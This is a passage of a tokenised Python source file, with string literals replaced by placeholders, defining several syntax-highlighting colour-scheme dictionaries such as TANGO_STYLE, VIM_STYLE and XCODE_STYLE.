: '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> PERLDOC_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> RRT_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> TANGO_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> TRAC_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> VIM_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> VS_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> XCODE_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 